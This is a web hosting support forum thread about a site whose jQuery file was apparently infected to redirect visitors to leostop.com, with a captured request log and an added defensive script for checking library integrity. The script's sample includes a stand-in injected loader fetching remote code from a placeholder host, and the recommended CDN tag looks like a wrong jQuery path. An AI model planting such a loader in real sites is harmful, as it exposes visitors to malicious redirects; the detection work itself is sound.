Website gets forwarded to malicious website

Username epiz_30276383

I hosted my domain to point to the hosting here. It worked well for a few days, now, when anyone visits my website, it goes to a malicious website leostop

Then the user goes back and the website works fine.

Can anyone suggest what’s happening?

What is the domain name?

1 Like

Rule of thumb, no clear information results with nothing.

http://myosys.us

It is fine for me. Try clearing your cache. Some adverts redirect to suspicious sites, so remove any disreputable advertisers.

3 Likes

I just tried from a different laptop

typed website name
first it said it is going to a “non trusted” site, do you want to continue
when I click “Continue” it goes to myosys.us homepage then immediately goes to

https://leostop.com/tracking/tracking.php?full_url=http://myosys.us/

It then says “the site has been reported unsafe”

the same behavior was also reported by someone else whom I asked to visit the website

Try from a different network, such as a cellular network. Then does it work?

2 Likes

I’m pretty sure it’s not our hosting. A quick Google search for that domain doesn’t redirect a lot of results, but it does show a few sites which are not hosted with us.

So my money is on something like malicious code on your website (this can happen with outdated or pirated software), a virus on your computer or a malicious party in your network intercepting and redirecting traffic.

2 Likes

Thank you for your confirmation and inputs.

Appreciate

By this it turns out that your jquery is infected :slightly_smiling_face:
It is easily possible that someone pushed the obfuscated code inside or otherwise hid it


Request 27: http://leostop.com/tracking/tracking.js?_=1642457157955

URL: http://leostop.com/tracking/tracking.js?_=1642457157955
Host: leostop.com
IP: 172.67.196.212
Error/Status Code: 301
Priority: Low
Protocol: http/1.1
Initiated By: http://www.myosys.us/js/jquery-3.4.1.min.js line 1 column 82241
Request Start: 1.576 s
DNS Lookup: 70 ms
Initial Connection: 75 ms
Time to First Byte: 122 ms
Bytes In (downloaded): 0.0 KB
Bytes Out (uploaded): 0.9 KB

Request Headers:

Host: leostop.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 PTST/211207.195343
Accept: */*
Referer: http://www.myosys.us/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response Headers:

HTTP/1.1 301 Moved Permanently
Date: Mon, 17 Jan 2022 22:05:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 17 Jan 2022 23:05:58 GMT
Location: https://leostop.com/tracking/tracking.js?_=1642457157955
Report-To: {"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v3?s=JX%2F91IJhpu8a4whz5XjU46Hkp1fmjyqKPrM8IR6oBNtTfjQdrRYBkjVZWTZ1%2Fqtsghtdm1fqdzL%2FINArHX2nhzEv42I6a5R%2FTCSwetSRIhX%2Fl%2BvjmEkdxJZKF7YiyA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 6cf2e356b85882f9-IAD
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


Or you use some demo or unpurchased software (pirated),
so the author checks if the host is valid (for which someone bought some software), and if not, then throws an error and makes a redirection.


And you should definitely do a jQuery script update if possible and if everything works




You are not the only one who has this problem

4 Likes
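
An added example, not part of the original thread: one way to confirm whether a locally hosted library file such as `js/jquery-3.4.1.min.js` has been modified is to compare it byte for byte with a clean copy obtained from the library's official distribution. The sample buffers and the hosts `lib.example` and `tracker.example` below are constructed for illustration; they are not the real jQuery file or the code found on the affected site.

```javascript
// Added example: compare a served copy of a JS library against a clean reference copy.
const crypto = require("crypto");

// Subresource Integrity value ("sha384-<base64>") for a file's bytes.
function sriDigest(buf, algo = "sha384") {
  return `${algo}-` + crypto.createHash(algo).update(buf).digest("base64");
}

// Offset of the first byte where the two copies differ, or -1 if identical.
function firstDifference(served, reference) {
  const n = Math.min(served.length, reference.length);
  for (let i = 0; i < n; i++) if (served[i] !== reference[i]) return i;
  return served.length === reference.length ? -1 : n;
}

// Hostnames that appear in plain-text URLs. Obfuscated loaders will not show
// up here, which is why the digest comparison is the authoritative check.
function urlHosts(buf) {
  const hosts = new Set();
  const re = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  for (const m of buf.toString("latin1").matchAll(re)) hosts.add(m[1].toLowerCase());
  return hosts;
}

function checkLibrary(served, reference) {
  const refHosts = urlHosts(reference);
  return {
    intact: sriDigest(served) === sriDigest(reference),
    integrity: sriDigest(reference), // value for a <script integrity="..."> attribute
    firstDiffOffset: firstDifference(served, reference),
    extraBytes: served.length - reference.length,
    newHosts: [...urlHosts(served)].filter((h) => !refHosts.has(h)).sort(),
  };
}

// Constructed sample data (assumption): a tiny stand-in library and an appended loader.
const clean = Buffer.from('/*! demo-lib v1 | https://lib.example/license */\n!function(){window.demo=1}();\n');
const injected = Buffer.from('var s=document.createElement("script");s.src="//tracker.example/t.js";');
const tampered = Buffer.concat([clean, injected]);

console.log(checkLibrary(tampered, clean));
```

For real files, read both copies with `fs.readFileSync` and pass the buffers to `checkLibrary`; `firstDiffOffset` gives the position in the minified file where the inspection should start.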

Thank you so much for this info

I am new to jQuery. Can you please guide me:
shall I just re-upload my files, or shall I remove those references in the jQuery file?

Are there any resolution steps somewhere?

1 Like

You are better off using up-to-date CDN hosted jQuery.
I use JsDelivr CDN. Here’s how to include their jQuery:

<script src="https://cdn.jsdelivr.net/npm/[email protected]/src/core.min.js" crossorigin="anonymous"></script>
3 Likes

It depends on how the malware came to be there in the first place. So no, we have no step by step way to fix this, because there are a lot of variables to account for.

For starters, you should take a good look at the software you’re using:

  • Is the software being actively developed and maintained, and are you running the latest, or at least supported, version?
  • Is the software being developed by a reliable party? A well known company is a safer source than some random person on a forum.
  • Did you get the software from a reliable source? So a distribution channel linked to by the software author, not some random file sharing sites you found through Google.

If the software is outdated, built by someone with either bad intentions or someone who just isn’t good at writing safe code, or retrieved from an unreliable third party source, your best bet is to wipe the entire site and start over. And go for software which is safe if you do.

Replacing the infected jQuery can help, but not if it’s just one symptom of unsafe, malware infected software.

3 Likes
